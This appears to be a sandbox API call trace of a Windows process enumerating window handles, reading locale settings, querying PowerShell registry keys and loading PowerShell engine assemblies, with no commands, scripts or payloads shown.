	[0279.549] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x3c4
	[0279.550] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x7d4
	[0279.550] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x6c8
	[0279.550] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0xb54
	[0279.550] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0xb54
	[0279.550] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0xb5c
	[0279.550] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x838
	[0279.550] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x818
	[0279.550] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x5b8
	[0279.551] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x494
	[0279.551] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x1ec
	[0279.551] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x440
	[0279.551] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x7e8
	[0279.551] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x730
	[0279.551] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x2c8
	[0279.551] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x31c
	[0279.551] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x330
	[0279.551] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x128
	[0279.551] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x5c8
	[0279.552] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x6f8
	[0279.552] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x358
	[0279.552] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x73c
	[0279.552] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0xb0
	[0279.552] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x250
	[0279.552] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x240
	[0279.552] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x790
	[0279.552] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x61c
	[0279.552] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x568
	[0279.552] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x538
	[0279.552] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x540
	[0279.552] GetWindowThreadProcessId (in: hWnd=0x700a4, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x510
	[0279.553] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x460
	[0279.553] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x79c
	[0279.553] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x4e0
	[0279.553] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x460
	[0279.553] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x1cdba0 | out: lpdwProcessId=0x1cdba0) returned 0x778
	[0279.556] WerSetFlags () returned 0x0
	[0279.566] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0279.566] CoTaskMemFree (pv=0x0) 
	[0279.567] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1cdf08, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1cdf00 | out: pulNumLanguages=0x1cdf08, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1cdf00) returned 1
	[0279.567] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1cdf08, pwszLanguagesBuffer=0x2c45cf0, pcchLanguagesBuffer=0x1cdf00 | out: pulNumLanguages=0x1cdf08, pwszLanguagesBuffer=0x2c45cf0, pcchLanguagesBuffer=0x1cdf00) returned 1
	[0280.276] CoTaskMemAlloc (cb=0x24) returned 0x3be7f0
	[0280.276] GetUserDefaultLocaleName (in: lpLocaleName=0x3be7f0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0280.276] CoTaskMemFree (pv=0x3be7f0) 
	[0280.299] CoTaskMemAlloc (cb=0x104) returned 0x3caeb0
	[0280.299] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3caeb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0280.299] CoTaskMemFree (pv=0x3caeb0) 
	[0280.301] CoTaskMemAlloc (cb=0x104) returned 0x3caeb0
	[0280.301] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3caeb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0280.301] CoTaskMemFree (pv=0x3caeb0) 
	[0280.303] CoTaskMemAlloc (cb=0x104) returned 0x3caeb0
	[0280.303] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3caeb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0280.304] CoTaskMemFree (pv=0x3caeb0) 
	[0280.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0280.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0280.314] SetErrorMode (uMode=0x1) returned 0x1
	[0280.314] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1cdb80 | out: lpFileInformation=0x1cdb80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0280.314] SetErrorMode (uMode=0x1) returned 0x1
	[0280.314] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1cddf0 | out: lpdwHandle=0x1cddf0) returned 0x94c
	[0280.315] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c49580 | out: lpData=0x2c49580) returned 1
	[0280.316] VerQueryValueW (in: pBlock=0x2c49580, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1cdd68, puLen=0x1cdd60 | out: lplpBuffer=0x1cdd68*=0x2c4961c, puLen=0x1cdd60) returned 1
	[0280.316] VerQueryValueW (in: pBlock=0x2c49580, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1cdcd8, puLen=0x1cdcd0 | out: lplpBuffer=0x1cdcd8*=0x2c496f8, puLen=0x1cdcd0) returned 1
	[0280.316] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0280.316] CoTaskMemAlloc (cb=0x2e) returned 0x3c1180
	[0280.316] lstrcpyW (in: lpString1=0x3c1180, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0280.316] CoTaskMemFree (pv=0x3c1180) 
	[0280.316] VerQueryValueW (in: pBlock=0x2c49580, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1cdcd8, puLen=0x1cdcd0 | out: lplpBuffer=0x1cdcd8*=0x2c4974c, puLen=0x1cdcd0) returned 1
	[0280.316] lstrlenW (lpString="System.Management.Automation") returned 28
	[0280.316] CoTaskMemAlloc (cb=0x3c) returned 0x3c98f0
	[0280.316] lstrcpyW (in: lpString1=0x3c98f0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0280.316] CoTaskMemFree (pv=0x3c98f0) 
	[0280.316] VerQueryValueW (in: pBlock=0x2c49580, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1cdcd8, puLen=0x1cdcd0 | out: lplpBuffer=0x1cdcd8*=0x2c497a8, puLen=0x1cdcd0) returned 1
	[0280.316] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0280.316] CoTaskMemAlloc (cb=0x20) returned 0x3c4f10
	[0280.316] lstrcpyW (in: lpString1=0x3c4f10, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0280.316] CoTaskMemFree (pv=0x3c4f10) 
	[0280.316] VerQueryValueW (in: pBlock=0x2c49580, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1cdcd8, puLen=0x1cdcd0 | out: lplpBuffer=0x1cdcd8*=0x2c497e8, puLen=0x1cdcd0) returned 1
	[0280.316] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0280.316] CoTaskMemAlloc (cb=0x44) returned 0x3c98f0
	[0280.316] lstrcpyW (in: lpString1=0x3c98f0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0280.316] CoTaskMemFree (pv=0x3c98f0) 
	[0280.316] VerQueryValueW (in: pBlock=0x2c49580, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1cdcd8, puLen=0x1cdcd0 | out: lplpBuffer=0x1cdcd8*=0x2c49850, puLen=0x1cdcd0) returned 1
	[0280.316] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0280.317] CoTaskMemAlloc (cb=0x76) returned 0x367790
	[0280.317] lstrcpyW (in: lpString1=0x367790, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0280.317] CoTaskMemFree (pv=0x367790) 
	[0280.317] VerQueryValueW (in: pBlock=0x2c49580, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1cdcd8, puLen=0x1cdcd0 | out: lplpBuffer=0x1cdcd8*=0x2c498ec, puLen=0x1cdcd0) returned 1
	[0280.317] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0280.317] CoTaskMemAlloc (cb=0x44) returned 0x3c98f0
	[0280.317] lstrcpyW (in: lpString1=0x3c98f0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0280.317] CoTaskMemFree (pv=0x3c98f0) 
	[0280.317] VerQueryValueW (in: pBlock=0x2c49580, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1cdcd8, puLen=0x1cdcd0 | out: lplpBuffer=0x1cdcd8*=0x2c49950, puLen=0x1cdcd0) returned 1
	[0280.317] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0280.317] CoTaskMemAlloc (cb=0x58) returned 0x315ea0
	[0280.317] lstrcpyW (in: lpString1=0x315ea0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0280.317] CoTaskMemFree (pv=0x315ea0) 
	[0280.317] VerQueryValueW (in: pBlock=0x2c49580, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1cdcd8, puLen=0x1cdcd0 | out: lplpBuffer=0x1cdcd8*=0x2c499cc, puLen=0x1cdcd0) returned 1
	[0280.317] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0280.317] CoTaskMemAlloc (cb=0x20) returned 0x3c4f10
	[0280.317] lstrcpyW (in: lpString1=0x3c4f10, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0280.317] CoTaskMemFree (pv=0x3c4f10) 
	[0280.317] VerQueryValueW (in: pBlock=0x2c49580, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1cdcd8, puLen=0x1cdcd0 | out: lplpBuffer=0x1cdcd8*=0x2c49674, puLen=0x1cdcd0) returned 1
	[0280.317] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0280.317] CoTaskMemAlloc (cb=0x66) returned 0x3c56d0
	[0280.317] lstrcpyW (in: lpString1=0x3c56d0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0280.317] CoTaskMemFree (pv=0x3c56d0) 
	[0280.317] VerQueryValueW (in: pBlock=0x2c49580, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1cdcd8, puLen=0x1cdcd0 | out: lplpBuffer=0x1cdcd8*=0x0, puLen=0x1cdcd0) returned 0
	[0280.317] VerQueryValueW (in: pBlock=0x2c49580, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1cdcd8, puLen=0x1cdcd0 | out: lplpBuffer=0x1cdcd8*=0x0, puLen=0x1cdcd0) returned 0
	[0280.317] VerQueryValueW (in: pBlock=0x2c49580, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1cdcd8, puLen=0x1cdcd0 | out: lplpBuffer=0x1cdcd8*=0x0, puLen=0x1cdcd0) returned 0
	[0280.317] VerQueryValueW (in: pBlock=0x2c49580, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1cdca8, puLen=0x1cdca0 | out: lplpBuffer=0x1cdca8*=0x2c4961c, puLen=0x1cdca0) returned 1
	[0280.317] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0280.317] VerLanguageNameW (in: wLang=0x0, szLang=0x35c680, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0280.318] CoTaskMemFree (pv=0x35c680) 
	[0280.318] VerQueryValueW (in: pBlock=0x2c49580, lpSubBlock="\\", lplpBuffer=0x1cdcf8, puLen=0x1cdcf0 | out: lplpBuffer=0x1cdcf8*=0x2c495a8, puLen=0x1cdcf0) returned 1
	[0280.862] CoTaskMemAlloc (cb=0x104) returned 0x3caeb0
	[0280.862] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3caeb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0280.863] CoTaskMemFree (pv=0x3caeb0) 
	[0280.867] CoTaskMemAlloc (cb=0x104) returned 0x3caeb0
	[0280.868] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3caeb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0280.868] CoTaskMemFree (pv=0x3caeb0) 
	[0280.872] lstrlenW (lpString="䅁") returned 1
	[0280.883] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cdbc8 | out: phkResult=0x1cdbc8*=0x304) returned 0x0
	[0280.885] RegOpenKeyExW (in: hKey=0x304, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cdbb8 | out: phkResult=0x1cdbb8*=0x308) returned 0x0
	[0280.885] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cdc48 | out: phkResult=0x1cdc48*=0x30c) returned 0x0
	[0280.890] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cdb8c, lpData=0x0, lpcbData=0x1cdb88*=0x0 | out: lpType=0x1cdb8c*=0x1, lpData=0x0, lpcbData=0x1cdb88*=0x56) returned 0x0
	[0280.891] CoTaskMemAlloc (cb=0x5a) returned 0x3c5660
	[0280.891] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cdb5c, lpData=0x3c5660, lpcbData=0x1cdb58*=0x56 | out: lpType=0x1cdb5c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cdb58*=0x56) returned 0x0
	[0280.891] CoTaskMemFree (pv=0x3c5660) 
	[0281.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0281.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0281.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0281.365] CoTaskMemAlloc (cb=0x104) returned 0x3caeb0
	[0281.365] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3caeb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0281.365] CoTaskMemFree (pv=0x3caeb0) 
	[0285.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1cd780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0285.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1cd780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0287.107] CoTaskMemAlloc (cb=0x104) returned 0x3d2670
	[0287.107] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0287.108] CoTaskMemFree (pv=0x3d2670) 
	[0287.109] CoTaskMemAlloc (cb=0x104) returned 0x3d2670
	[0287.109] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0287.109] CoTaskMemFree (pv=0x3d2670) 
	[0287.771] CoTaskMemAlloc (cb=0x104) returned 0x3d2670
	[0287.771] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0287.771] CoTaskMemFree (pv=0x3d2670) 
	[0287.773] CoTaskMemAlloc (cb=0x104) returned 0x3d2670
	[0287.773] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0287.773] CoTaskMemFree (pv=0x3d2670) 
	[0287.773] CoTaskMemAlloc (cb=0x104) returned 0x3d2670
	[0287.773] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0287.773] CoTaskMemFree (pv=0x3d2670) 
	[0289.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0289.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0289.965] CoTaskMemAlloc (cb=0x104) returned 0x3d2670
	[0289.965] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0289.966] CoTaskMemFree (pv=0x3d2670) 
	[0289.969] CoTaskMemAlloc (cb=0x104) returned 0x3d2670
	[0289.969] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0289.969] CoTaskMemFree (pv=0x3d2670) 
	[0291.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0291.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0297.010] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1cd780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0297.010] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1cd780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0297.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0297.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0300.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0300.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0301.456] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0301.456] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0301.456] CoTaskMemFree (pv=0x3d2890) 
